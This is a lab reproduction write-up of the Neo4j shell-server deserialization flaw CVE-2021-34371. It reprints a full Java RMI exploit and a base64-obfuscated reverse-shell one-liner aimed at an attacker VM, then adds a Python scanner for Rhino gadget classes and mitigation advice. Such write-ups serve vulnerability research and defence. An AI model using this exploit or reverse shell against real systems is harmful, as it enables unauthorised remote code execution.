
CVE-2021-34371 Neo4j-Shell Vulnerability Reproduction

Date: 2024-04-23 21:56:43
Tags: shell String server exploit Shell 2021 Neo4j payload

Preface

I ran across this vulnerability by chance and decided to reproduce it in vulhub.
Important reminder: the environment for this reproduction requires Java 8.
To switch the Java environment on Kali, click here.

Vulnerability description

Neo4j through 3.4.18 (with the shell server enabled) exposes an RMI service that deserializes arbitrary Java objects, for example via setSessionVariable. An attacker can abuse this for remote code execution because the product ships dependencies that contain exploitable gadget chains.

Affected versions

Neo4j <= 3.4.18

Environment setup

Use the vulhub integrated environment: switch to the corresponding directory and bring up the docker container.
For details see: Neo4j-shell
Once it is up, the neo4j browser service is served on local port 7474.
Environment setup is now complete.

Vulnerability reproduction

Although the NoSQL management service is served on port 7474, this vulnerability is a deserialization attack against the neo4j-shell service listening on port 1337.

Switch to the /CVE-2021-34371/rhino_gadget directory
Run mvn install
This packages the files in the current directory into a jar, which is the exp used in this reproduction.
Here is another exp, posted to help fellow researchers understand the mechanism:
https://www.exploit-db.com/exploits/50170

# Exploit Title: Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)
# Date: 7/30/21
# Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc.
# Vendor Homepage: neo4j.com
# Software Link: https://neo4j.com/download-thanks/?edition=community&release=3.4.18&flavour=unix
# Version: 3.4.18
# Tested on: Windows, Mac

In older versions of Neo4j, when the shell server is enabled, RCE can be obtained via a Java deserialization exploit. In the ShellServer interface, a method setSessionVariable(Serializable paramSerializable, String paramString, Object paramObject) exists. Neo4j also has a dependency (rhino 1.7.9) with known RCE gadget chains. By crafting an object to abuse these gadget chains, one can obtain RCE via the shell server.

To create this from scratch using Java, you’ll need to modify the ysoserial library to include the payload found here https://github.com/mozilla/rhino/issues/520 (an update of the existing rhino gadget) as well as modify the ysoserial POM file to include the correct version of rhino. Rebuild ysoserial and include it on your exploit’s classpath. From there, you can use the ShellServer interface and associated code found in neo4j-shell-3.4.18.jar to make your client aware of the server’s method stubs. Now you should be able to call the setSessionVariable method from your exploit/client via RMI.
In your exploit, use ysoserial to generate a payload as follows: Object payload = new RhinoGadget().getObject(COMMAND), and then call the setSessionVariable with the payload in the paramObject parameter. The other two parameters can be anything. This will cause the server to deserialize your payload, triggering the gadget chain, and running your command.
It is worth noting that we chose to exploit this method and the paramObject parameter as this was the most direct; any method that takes in an Object (other than String or a primitive) is likely vulnerable as well.

package runnable;

import payloads.RhinoGadget;
import sun.rmi.registry.RegistryImpl_Stub;

import java.io.Serializable;
import java.rmi.Naming;
import org.neo4j.shell.ShellServer;

public class ExploitB {

    public static String COMMAND = "touch /tmp/test.txt";
    public static String TARGET = "rmi://127.0.0.1:1337";
    public static String TARGET_BINDING = "shell";

    public static void main (String args[]) throws Exception {

        boolean validBinding = checkBinding(TARGET_BINDING, TARGET);
        if (!validBinding)
        {
            System.out.println("[-] No valid binding found, shell server may not be listening. Exiting");
            System.exit(0);
        }

        System.out.println("[+] Found valid binding, proceeding to exploit");
        ShellServer server = (ShellServer) Naming.lookup(TARGET + "/" + TARGET_BINDING);

        Object payload = new RhinoGadget().getObject(COMMAND);

        //Here server.shutdown may also be callable without auth, just in case the exploit fails and you just want to turn the thing off
        try {
            server.setSessionVariable(newClientId(), "anything_here", payload);
        }
        catch (Exception UnmarshalException ) {
            System.out.println("[+] Caught an unmarshalled exception, this is expected.");
        }
        System.out.println("[+] Exploit completed");

    }

    /**
     * Just a helper method to validate that the rmi binding we're looking for is present
     * @param bindingToCheck the binding you'd like to check for
     * @param targetToCheck the rmi registry to check against
     * @return true if the binding is present, false if not
     */
    public static boolean checkBinding(String bindingToCheck, String targetToCheck) {

        System.out.println("Trying to enumerate server bindings: ");
        try {
            RegistryImpl_Stub stub = (RegistryImpl_Stub) Naming.lookup(targetToCheck);

            for (String element : stub.list()) {
                System.out.println("Found binding: " + element);
                if (element.equalsIgnoreCase(bindingToCheck))
                    return true;
            }
            return  false;
        }
        catch (Exception ex)
        {
            return false;
        }

    }

    public static Serializable newClientId() {
        return Integer.valueOf(1);
    }

}

After that, the target can be attacked.
Reverse the docker container's shell back to the VM:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzMS4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
Start a listener
Run the command
Receive the shell
Reproduction successful.
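The exploit-db write-up above shows the whole problem in one sentence: setSessionVariable deserializes whatever object the RMI client sends, and the rhino dependency supplies the gadget chain. From the defender's side, a useful triage step is to look at which classes a captured serialization stream names before any JVM deserializes it. The following Python is an added example, not code from the original post, from vulhub, or from exploit-db: it walks the TC_CLASSDESC records of a Java serialization stream and flags class names under rhino's org.mozilla.javascript package, the dependency the advisory identifies as the gadget source. The two sample streams are constructed by hand inside the block (a simplified java.lang.Integer without its Number superclass, and a placeholder class name under the rhino package that is not a real rhino class), not captures from a real Neo4j session.

```python
import re
import struct

# Java serialization stream constants (see java.io.ObjectStreamConstants).
STREAM_MAGIC = b"\xac\xed"
STREAM_VERSION = b"\x00\x05"
TC_NULL, TC_CLASSDESC, TC_OBJECT, TC_ENDBLOCKDATA = 0x70, 0x72, 0x73, 0x78
SC_SERIALIZABLE = 0x02

# Plausible class-name shapes: dotted names and array descriptors such as "[B" or "[Ljava.lang.Object;".
_CLASS_NAME = re.compile(r"^\[*L?[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*;?$")

# rhino's classes live under org.mozilla.javascript; a stream sent to a Neo4j shell
# server should have no business naming any of them.
DENY_PREFIXES = ("org.mozilla.javascript.",)


def classes_in_stream(data: bytes) -> list:
    """Heuristically list the class names carried by TC_CLASSDESC records.

    This is triage, not a full parser: a 0x72 byte inside string or binary field
    data can produce a spurious hit, so results are deduplicated and a hit means
    'worth a look', while an empty result is not proof of absence.
    """
    if not data.startswith(STREAM_MAGIC + STREAM_VERSION):
        raise ValueError("not a Java serialization stream (missing 0xACED0005 header)")
    found = []
    i = len(STREAM_MAGIC) + len(STREAM_VERSION)
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            # TC_CLASSDESC is followed by a 2-byte big-endian length and the class name.
            (length,) = struct.unpack_from(">H", data, i + 1)
            raw = data[i + 3 : i + 3 + length]
            if len(raw) == length:
                name = raw.decode("utf-8", errors="replace")
                if _CLASS_NAME.match(name):
                    if name not in found:
                        found.append(name)
                    i += 3 + length  # skip past the name so its own bytes are not rescanned
                    continue
        i += 1
    return found


def flag_gadget_classes(data: bytes, deny_prefixes=DENY_PREFIXES) -> list:
    """Return the class names in the stream that fall under a denied package prefix."""
    return [c for c in classes_in_stream(data) if c.startswith(deny_prefixes)]


# --- constructed sample streams (hand-built here, not captured from Neo4j) ---

def _utf(s: str) -> bytes:
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def _class_desc(name: str, serial_version_uid: int, prim_fields=()) -> bytes:
    """TC_CLASSDESC with SC_SERIALIZABLE, primitive fields only, no annotation, null superclass."""
    out = bytes([TC_CLASSDESC]) + _utf(name)
    out += struct.pack(">q", serial_version_uid) + bytes([SC_SERIALIZABLE])
    out += struct.pack(">H", len(prim_fields))
    for typecode, field_name in prim_fields:
        out += typecode.encode("ascii") + _utf(field_name)
    return out + bytes([TC_ENDBLOCKDATA, TC_NULL])


HEADER = STREAM_MAGIC + STREAM_VERSION

# Simplified java.lang.Integer(1): real serialVersionUID, but the Number superclass is omitted.
BENIGN_STREAM = (HEADER + bytes([TC_OBJECT])
                 + _class_desc("java.lang.Integer", 0x12E2A0A4F7818738, [("I", "value")])
                 + struct.pack(">i", 1))

# Placeholder class name under the rhino package; the name is constructed for this example.
SUSPICIOUS_STREAM = (HEADER + bytes([TC_OBJECT])
                     + _class_desc("org.mozilla.javascript.PlaceholderClass", 1, [("I", "dummy")])
                     + struct.pack(">i", 0))


if __name__ == "__main__":
    for label, stream in (("benign", BENIGN_STREAM), ("suspicious", SUSPICIOUS_STREAM)):
        print(label, classes_in_stream(stream), "flagged:", flag_gadget_classes(stream))
```

Because the scan is heuristic (a class descriptor split across TCP segments is missed, and a stray 0x72 inside field data can mislead it), it belongs in a packet-capture or IDS triage workflow, not on the enforcement path. The controls that actually close the hole are disabling the legacy shell server (dbms.shell.enabled=false in neo4j.conf on the 3.x line), keeping port 1337 off untrusted networks, and upgrading past 3.4.18; inside the JVM itself, a JEP 290 serialization filter (the jdk.serialFilter property, available from Java 8u121) can enforce the same package deny-list on the real ObjectInputStream.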

Acknowledgements

CVE-2021-34371 Neo4j Shell Server deserialization vulnerability reproduction
春秋云镜-Time-Writeup

From: https://www.cnblogs.com/Kawakaze777/p/18153842
